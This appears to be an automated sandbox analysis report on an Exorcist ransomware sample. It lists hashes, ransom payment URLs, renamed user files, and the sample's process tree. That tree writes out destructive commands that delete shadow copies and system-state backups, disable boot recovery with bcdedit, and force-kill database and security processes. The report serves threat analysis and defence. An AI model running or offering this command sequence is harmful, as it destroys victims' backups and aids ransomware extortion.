Resubmissions
23-09-2020 10:35
200923-mkwlt9yalx 1023-07-2020 14:59
200723-mtbw6t99d2 1023-07-2020 13:47
200723-5t3mhtw95x 10Analysis
-
max time kernel
137s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
23-09-2020 10:35
Static task
static1
Behavioral task
behavioral1
Sample
build-x64-crypt.bin.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
build-x64-crypt.bin.exe
Resource
win10
General
-
Target
build-x64-crypt.bin.exe
-
Size
52KB
-
MD5
8cc13fea61cc0ba1382a779ee46726f0
-
SHA1
bd8ef46a02085153605a87fcc047f7ef3d0c4131
-
SHA256
eeb8a83d7532797d39d060ffb2a65562e8d803c4dbd8379289f99367cac2f850
-
SHA512
2f317f04b6bda9af58b049cb9bd0032d08c0aa30b8ac8d76b10f738ab11f4cc9f4eca4af3ecf26e610715117e2d68e5f8fb0ac139e60e882cc24fc795bf0a34a
Malware Config
Extracted
C:\Users\Admin\Desktop\ArlomQ-decrypt.hta
exorcist
http://217.8.117.26/pay
http://4dnd3utjsmm2zcsb.onion/pay
Signatures
-
Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2936 bcdedit.exe 1332 bcdedit.exe -
Processes:
wbadmin.exewbadmin.exepid process 1844 wbadmin.exe 2128 wbadmin.exe -
Modifies extensions of user files 28 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
build-x64-crypt.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\CheckpointSave.crw => C:\Users\Admin\Pictures\CheckpointSave.crw.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\FormatPop.png => C:\Users\Admin\Pictures\FormatPop.png.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\ResetLimit.crw.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\WaitAssert.tif.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\DisconnectWrite.tiff => C:\Users\Admin\Pictures\DisconnectWrite.tiff.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\RenameConfirm.raw.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\ResetImport.png => C:\Users\Admin\Pictures\ResetImport.png.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\ResetLimit.crw => C:\Users\Admin\Pictures\ResetLimit.crw.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\ConvertFromUninstall.png => C:\Users\Admin\Pictures\ConvertFromUninstall.png.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\DismountJoin.raw.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\MountEnter.tiff build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\WaitAssert.tif => C:\Users\Admin\Pictures\WaitAssert.tif.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\DisconnectWrite.tiff build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\ResetImport.png.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\SuspendInstall.raw => C:\Users\Admin\Pictures\SuspendInstall.raw.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\SwitchRequest.raw => C:\Users\Admin\Pictures\SwitchRequest.raw.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\CheckpointSave.crw.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\DismountJoin.raw => C:\Users\Admin\Pictures\DismountJoin.raw.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\OptimizeBlock.tif => C:\Users\Admin\Pictures\OptimizeBlock.tif.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\RenameConfirm.raw => C:\Users\Admin\Pictures\RenameConfirm.raw.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\ConvertFromUninstall.png.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\FormatPop.png.ArlomQ build-x64-crypt.bin.exe File renamed C:\Users\Admin\Pictures\MountEnter.tiff => C:\Users\Admin\Pictures\MountEnter.tiff.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\SuspendInstall.raw.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\DisconnectWrite.tiff.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\MountEnter.tiff.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\OptimizeBlock.tif.ArlomQ build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\Pictures\SwitchRequest.raw.ArlomQ build-x64-crypt.bin.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
build-x64-crypt.bin.exedescription ioc process File opened (read-only) \??\H: build-x64-crypt.bin.exe File opened (read-only) \??\N: build-x64-crypt.bin.exe File opened (read-only) \??\P: build-x64-crypt.bin.exe File opened (read-only) \??\V: build-x64-crypt.bin.exe File opened (read-only) \??\F: build-x64-crypt.bin.exe File opened (read-only) \??\G: build-x64-crypt.bin.exe File opened (read-only) \??\W: build-x64-crypt.bin.exe File opened (read-only) \??\R: build-x64-crypt.bin.exe File opened (read-only) \??\T: build-x64-crypt.bin.exe File opened (read-only) \??\Y: build-x64-crypt.bin.exe File opened (read-only) \??\Z: build-x64-crypt.bin.exe File opened (read-only) \??\B: build-x64-crypt.bin.exe File opened (read-only) \??\J: build-x64-crypt.bin.exe File opened (read-only) \??\M: build-x64-crypt.bin.exe File opened (read-only) \??\Q: build-x64-crypt.bin.exe File opened (read-only) \??\L: build-x64-crypt.bin.exe File opened (read-only) \??\O: build-x64-crypt.bin.exe File opened (read-only) \??\S: build-x64-crypt.bin.exe File opened (read-only) \??\U: build-x64-crypt.bin.exe File opened (read-only) \??\A: build-x64-crypt.bin.exe File opened (read-only) \??\E: build-x64-crypt.bin.exe File opened (read-only) \??\I: build-x64-crypt.bin.exe File opened (read-only) \??\K: build-x64-crypt.bin.exe File opened (read-only) \??\X: build-x64-crypt.bin.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Drops file in Windows directory 6 IoCs
Processes:
wbadmin.exewbadmin.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2556 vssadmin.exe -
Kills process with taskkill 91 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2056 taskkill.exe 348 taskkill.exe 1788 taskkill.exe 1788 taskkill.exe 1788 taskkill.exe 2588 taskkill.exe 2120 taskkill.exe 256 taskkill.exe 2588 taskkill.exe 256 taskkill.exe 3768 taskkill.exe 1788 taskkill.exe 268 taskkill.exe 1956 taskkill.exe 3768 taskkill.exe 2120 taskkill.exe 2152 taskkill.exe 2116 taskkill.exe 264 taskkill.exe 2616 taskkill.exe 2744 taskkill.exe 3016 taskkill.exe 3236 taskkill.exe 280 taskkill.exe 3768 taskkill.exe 2484 taskkill.exe 2576 taskkill.exe 3016 taskkill.exe 2784 taskkill.exe 1784 taskkill.exe 2120 taskkill.exe 1792 taskkill.exe 3684 taskkill.exe 2476 taskkill.exe 3640 taskkill.exe 3500 taskkill.exe 2588 taskkill.exe 280 taskkill.exe 280 taskkill.exe 2484 taskkill.exe 3984 taskkill.exe 2960 taskkill.exe 1628 taskkill.exe 260 taskkill.exe 272 taskkill.exe 3148 taskkill.exe 1584 taskkill.exe 2480 taskkill.exe 2120 taskkill.exe 280 taskkill.exe 3768 taskkill.exe 2120 taskkill.exe 2152 taskkill.exe 1332 taskkill.exe 1604 taskkill.exe 3408 taskkill.exe 2112 taskkill.exe 1784 taskkill.exe 2588 taskkill.exe 1332 taskkill.exe 2780 taskkill.exe 1756 taskkill.exe 2492 taskkill.exe 3152 taskkill.exe -
NTFS ADS 5 IoCs
Processes:
build-x64-crypt.bin.exedescription ioc process File created C:\Users\Admin\AppData\Local\Temp\boot.sys:ivrhwmenumbuocvak build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:tpupnbvzicwro build-x64-crypt.bin.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd build-x64-crypt.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:iykxevszimranzpu build-x64-crypt.bin.exe File created C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd build-x64-crypt.bin.exe -
Suspicious behavior: EnumeratesProcesses 332 IoCs
Processes:
build-x64-crypt.bin.exepid process 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe 3676 build-x64-crypt.bin.exe -
Suspicious use of AdjustPrivilegeToken 133 IoCs
Processes:
WMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeIncreaseQuotaPrivilege 3016 WMIC.exe Token: SeSecurityPrivilege 3016 WMIC.exe Token: SeTakeOwnershipPrivilege 3016 WMIC.exe Token: SeLoadDriverPrivilege 3016 WMIC.exe Token: SeSystemProfilePrivilege 3016 WMIC.exe Token: SeSystemtimePrivilege 3016 WMIC.exe Token: SeProfSingleProcessPrivilege 3016 WMIC.exe Token: SeIncBasePriorityPrivilege 3016 WMIC.exe Token: SeCreatePagefilePrivilege 3016 WMIC.exe Token: SeBackupPrivilege 3016 WMIC.exe Token: SeRestorePrivilege 3016 WMIC.exe Token: SeShutdownPrivilege 3016 WMIC.exe Token: SeDebugPrivilege 3016 WMIC.exe Token: SeSystemEnvironmentPrivilege 3016 WMIC.exe Token: SeRemoteShutdownPrivilege 3016 WMIC.exe Token: SeUndockPrivilege 3016 WMIC.exe Token: SeManageVolumePrivilege 3016 WMIC.exe Token: 33 3016 WMIC.exe Token: 34 3016 WMIC.exe Token: 35 3016 WMIC.exe Token: 36 3016 WMIC.exe Token: SeIncreaseQuotaPrivilege 3016 WMIC.exe Token: SeSecurityPrivilege 3016 WMIC.exe Token: SeTakeOwnershipPrivilege 3016 WMIC.exe Token: SeLoadDriverPrivilege 3016 WMIC.exe Token: SeSystemProfilePrivilege 3016 WMIC.exe Token: SeSystemtimePrivilege 3016 WMIC.exe Token: SeProfSingleProcessPrivilege 3016 WMIC.exe Token: SeIncBasePriorityPrivilege 3016 WMIC.exe Token: SeCreatePagefilePrivilege 3016 WMIC.exe Token: SeBackupPrivilege 3016 WMIC.exe Token: SeRestorePrivilege 3016 WMIC.exe Token: SeShutdownPrivilege 3016 WMIC.exe Token: SeDebugPrivilege 3016 WMIC.exe Token: SeSystemEnvironmentPrivilege 3016 WMIC.exe Token: SeRemoteShutdownPrivilege 3016 WMIC.exe Token: SeUndockPrivilege 3016 WMIC.exe Token: SeManageVolumePrivilege 3016 WMIC.exe Token: 33 3016 WMIC.exe Token: 34 3016 WMIC.exe Token: 35 3016 WMIC.exe Token: 36 3016 WMIC.exe Token: SeBackupPrivilege 1056 vssvc.exe Token: SeRestorePrivilege 1056 vssvc.exe Token: SeAuditPrivilege 1056 vssvc.exe Token: SeDebugPrivilege 272 taskkill.exe Token: SeDebugPrivilege 1772 taskkill.exe Token: SeDebugPrivilege 2120 taskkill.exe Token: SeDebugPrivilege 2736 taskkill.exe Token: SeDebugPrivilege 3148 taskkill.exe Token: SeDebugPrivilege 2488 taskkill.exe Token: SeDebugPrivilege 2116 taskkill.exe Token: SeDebugPrivilege 264 taskkill.exe Token: SeDebugPrivilege 1756 taskkill.exe Token: SeDebugPrivilege 2484 taskkill.exe Token: SeDebugPrivilege 3984 taskkill.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeDebugPrivilege 3768 taskkill.exe Token: SeDebugPrivilege 268 taskkill.exe Token: SeDebugPrivilege 2056 taskkill.exe Token: SeDebugPrivilege 2476 taskkill.exe Token: SeDebugPrivilege 2616 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 1604 taskkill.exe -
Suspicious use of WriteProcessMemory 392 IoCs
Processes:
build-x64-crypt.bin.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3676 wrote to memory of 2568 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 2568 3676 build-x64-crypt.bin.exe cmd.exe PID 2568 wrote to memory of 3016 2568 cmd.exe WMIC.exe PID 2568 wrote to memory of 3016 2568 cmd.exe WMIC.exe PID 3676 wrote to memory of 1644 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 1644 3676 build-x64-crypt.bin.exe cmd.exe PID 1644 wrote to memory of 1844 1644 cmd.exe wbadmin.exe PID 1644 wrote to memory of 1844 1644 cmd.exe wbadmin.exe PID 3676 wrote to memory of 1568 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 1568 3676 build-x64-crypt.bin.exe cmd.exe PID 1568 wrote to memory of 2128 1568 cmd.exe wbadmin.exe PID 1568 wrote to memory of 2128 1568 cmd.exe wbadmin.exe PID 3676 wrote to memory of 2472 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 2472 3676 build-x64-crypt.bin.exe cmd.exe PID 2472 wrote to memory of 2936 2472 cmd.exe bcdedit.exe PID 2472 wrote to memory of 2936 2472 cmd.exe bcdedit.exe PID 3676 wrote to memory of 3408 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 3408 3676 build-x64-crypt.bin.exe cmd.exe PID 3408 wrote to memory of 1332 3408 cmd.exe bcdedit.exe PID 3408 wrote to memory of 1332 3408 cmd.exe bcdedit.exe PID 3676 wrote to memory of 3356 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 3356 3676 build-x64-crypt.bin.exe cmd.exe PID 3356 wrote to memory of 2556 3356 cmd.exe vssadmin.exe PID 3356 wrote to memory of 2556 3356 cmd.exe vssadmin.exe PID 3676 wrote to memory of 3236 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 3236 3676 build-x64-crypt.bin.exe cmd.exe PID 3236 wrote to memory of 3744 3236 cmd.exe VSSVC.exe PID 3236 wrote to memory of 3744 3236 cmd.exe VSSVC.exe PID 3676 wrote to memory of 1312 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 1312 3676 build-x64-crypt.bin.exe cmd.exe PID 1312 wrote to memory of 272 1312 cmd.exe taskkill.exe PID 1312 wrote to memory of 272 1312 cmd.exe taskkill.exe PID 3676 wrote to memory of 3016 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 3016 3676 build-x64-crypt.bin.exe cmd.exe PID 3016 wrote to memory of 1772 3016 cmd.exe taskkill.exe PID 3016 wrote to memory of 1772 3016 cmd.exe taskkill.exe PID 3676 wrote to memory of 1844 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 1844 3676 build-x64-crypt.bin.exe cmd.exe PID 1844 wrote to memory of 2120 1844 cmd.exe taskkill.exe PID 1844 wrote to memory of 2120 1844 cmd.exe taskkill.exe PID 3676 wrote to memory of 2148 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 2148 3676 build-x64-crypt.bin.exe cmd.exe PID 2148 wrote to memory of 2736 2148 cmd.exe taskkill.exe PID 2148 wrote to memory of 2736 2148 cmd.exe taskkill.exe PID 3676 wrote to memory of 2472 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 2472 3676 build-x64-crypt.bin.exe cmd.exe PID 2472 wrote to memory of 3148 2472 cmd.exe taskkill.exe PID 2472 wrote to memory of 3148 2472 cmd.exe taskkill.exe PID 3676 wrote to memory of 3860 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 3860 3676 build-x64-crypt.bin.exe cmd.exe PID 3860 wrote to memory of 2488 3860 cmd.exe taskkill.exe PID 3860 wrote to memory of 2488 3860 cmd.exe taskkill.exe PID 3676 wrote to memory of 1140 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 1140 3676 build-x64-crypt.bin.exe cmd.exe PID 1140 wrote to memory of 2116 1140 cmd.exe taskkill.exe PID 1140 wrote to memory of 2116 1140 cmd.exe taskkill.exe PID 3676 wrote to memory of 252 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 252 3676 build-x64-crypt.bin.exe cmd.exe PID 252 wrote to memory of 264 252 cmd.exe taskkill.exe PID 252 wrote to memory of 264 252 cmd.exe taskkill.exe PID 3676 wrote to memory of 3016 3676 build-x64-crypt.bin.exe cmd.exe PID 3676 wrote to memory of 3016 3676 build-x64-crypt.bin.exe cmd.exe PID 3016 wrote to memory of 1756 3016 cmd.exe taskkill.exe PID 3016 wrote to memory of 1756 3016 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /C wmic.exe SHADOWCOPY DELETE /nointeractive2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY DELETE /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP3⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\SYSTEM32\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest3⤵
- Deletes System State backups
- Drops file in Windows directory
-
C:\Windows\SYSTEM32\cmd.execmd /C bcdedit.exe /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SYSTEM32\cmd.execmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\SYSTEM32\cmd.execmd /C vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\cmd.execmd /C C:\Windows\system32\vssvc.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\VSSVC.exeC:\Windows\system32\vssvc.exe3⤵
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM wxServer*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wxServer*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM QBFCService*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBFCService*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM QBVSS*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBVSS*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM sql*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sql*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM msaccess*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM msaccess*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM mssql*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM mssql*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM mysql*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM mysql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM wxServerView*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wxServerView*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM sqlmangr*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqlmangr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM RAgui*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM RAgui*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM supervise*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM supervise*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM Culture*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Culture*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM Defwatch*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Defwatch*3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM winword*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM winword*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM QBW32*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBW32*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM QBDBMgr*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBDBMgr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM qbupdate*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM qbupdate*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM axlbridge*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM axlbridge*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM httpd*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM httpd*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM fdlauncher*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM fdlauncher*3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM MsDtSrvr*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MsDtSrvr*3⤵
- Kills process with taskkill
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM java*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM java*3⤵
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM 360se*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM 360se*3⤵
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM 360doctor*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM 360doctor*3⤵
-
C:\Windows\SYSTEM32\cmd.execmd /C taskkill /F /T /IM wdswfsafe*2⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wdswfsafe*3⤵
-
